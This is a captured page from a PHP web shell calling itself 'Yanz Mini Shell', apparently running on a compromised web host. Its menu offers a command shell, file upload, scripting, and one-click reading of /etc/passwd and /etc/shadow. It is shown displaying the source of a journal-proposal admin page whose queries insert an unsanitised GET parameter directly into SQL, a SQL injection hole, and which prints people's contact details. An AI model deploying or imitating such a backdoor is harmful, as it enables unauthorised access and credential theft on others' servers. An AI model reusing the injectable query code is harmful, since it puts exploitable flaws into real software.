Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
naacpd
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php if(isset($_GET['proposal_id'])) $proposal_id=$_GET['proposal_id']; $get_information = $pdo->query("SELECT R.*, M.* FROM journal_proposal R, member_information M Where R.journal_author=M.email And R.proposal_no='$proposal_id'"); $info_row = $get_information->fetch(); ?> <section class="content"> <div class="row"> <div class="col-sm-12"> <div class="box box-primary"> <div class="box-header with-border"> <h3 class="box-title"><?php if(!empty($main_menu)){ echo $main_menu;echo " <i class='fa fa-angle-right' style='font-weight:bold;'></i> ";} ?> <?php echo $menu; ?></h3> <div class="box-tools pull-right"> </div> </div> <div class="box-body"> <div class="container-fluid"> <div class="row"> <div class="col-md-6"> <p class="my-content-header">About Proposal</p> <table class="my-table-info" width="100%"> <tr> <td width="30%">Journal Title</td> <td width="70%">: <b><?php echo $info_row["journal_title"]; ?></b></td> </tr> <tr> <td>Topic / Area Name</td> <td>: <?php echo $info_row["related_topic"]; ?></td> </tr> <tr> <td>Proposal Date</td> <td>: <?php echo date("d - F - Y", strtotime($info_row["proposal_date"])); ?></td> </tr> <tr> <td>Proposal Status</td> <td>: <?php echo $info_row["proposal_status"]; ?></td> </tr> </table><br> </div> <div class="col-md-6"> <p class="my-content-header">About Journalist</p> <table class="my-table-info" width="100%"> <tr> <td width="30%">Journalist Name</td> <td width="70%">: <?php echo $info_row["member_name"]; ?></td> </tr> <tr> <td>Phone Number</td> <td>: <?php echo $info_row["phone_no"]; ?></td> </tr> <tr> <td>Email Address</td> <td>: <?php echo $info_row["email"]; ?></td> </tr> <tr> <td>Country</td> <td>: <?php echo $info_row["country"]; ?></td> </tr> </table><br> </div> <?php $r=0; $get_reviewer = $pdo->query("SELECT R.*, U.* From journal_reviewer R, user_information U Where R.reviewer=U.user_mail AND R.proposal_no='$proposal_id'"); while ($rv_row = $get_reviewer->fetch()) { $r++; if(!empty($rv_row["reviewer"])) { ?> <div class="col-md-6"> <p class="my-content-header">About Reviewer (<?php echo $r;?>)</p> <table class="my-table-info" width="100%"> <tr> <td width="30%">Reviewer Name</td> <td width="70%">: <b><?php echo $rv_row["user_name"]; ?></b></td> </tr> <tr> <td>Email Address</td> <td>: <?php echo $rv_row["user_mail"]; ?></td> </tr> <tr> <td>Phone Number</td> <td>: <?php echo $rv_row["user_phone"]; ?></td> </tr> <tr> <td>Sending Date</td> <td>: <?php echo date("d - F - Y", strtotime($rv_row["received_date"])); ?></td> </tr> <tr> <td width="30%">Review Status</td> <td width="70%">: <b><?php echo $rv_row["status"]; ?></b></td> </tr> </table><br><br><br> </div> <?php } } ?> <?php if($Action=="Accept Proposal"){?> <div class="col-md-12"> <br><p class="my-content-header">Accept Proposal and Send Inception Presentation Date</p> <form method="post" class="form" action="?menu=<?php echo $menu; ?>&page_title=insert_data&proposal_id=<?php echo $proposal_id; ?>&main_menu=<?php echo $main_menu; ?>"> <div class="container-fluid"> <div class="row"> <div class="col-md-3"> </div> <div class="col-md-6"> <div class="container-fluid"> <div class="col-md-12 my-form-container"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="officer_id">Inception Presentation Date<span style="color:#F00;">*</span></label> <input class="form-control date" name="pre_presentation_date" id="pre_presentation_date" type="text" placeholder="Click to select Date" required> </div> </div> <div class="col-md-12"> <div class="box-tools pull-right"> <br><button class="btn btn-info" type="submit" name="accept_journal_proposal"><i class="fa fa-send"></i> Accept & Send notificaiton</button><br> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-3"> </div> </div> </div> </form> </div> <?php } if($Action=="Send Final Date"){?> <div class="col-md-12"> <br><p class="my-content-header">Assign final submission and final presentation date</p> <form method="post" class="form" action="?menu=<?php echo $menu; ?>&page_title=insert_data&proposal_id=<?php echo $proposal_id; ?>&main_menu=<?php echo $main_menu; ?>"> <div class="container-fluid"> <div class="row"> <div class="col-md-3"> </div> <div class="col-md-6"> <div class="container-fluid"> <div class="col-md-12 my-form-container"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="officer_id">Final Presentation Date<span style="color:#F00;">*</span></label> <input class="form-control date" name="final_presentation_date" id="final_presentation_date" type="text" placeholder="Click to select Date" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="officer_id">Final Submit Date<span style="color:#F00;">*</span></label> <input class="form-control date" name="submit_date" id="submit_date" type="text" placeholder="Click to select Date" required> </div> </div> <div class="col-md-12"> <div class="box-tools pull-right"> <br><button class="btn btn-info" type="submit" name="send_final_date_of_journal"><i class="fa fa-send"></i> Accept & Send notificaiton</button><br> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-3"> </div> </div> </div> </form> </div> <?php } ?> </div> </div> </div> </div> </div> </div> </section> <style> th{ text-align:center; } .table-responsive{ overflow-x: hidden; } </style>
Free Space : 464358494208 Byte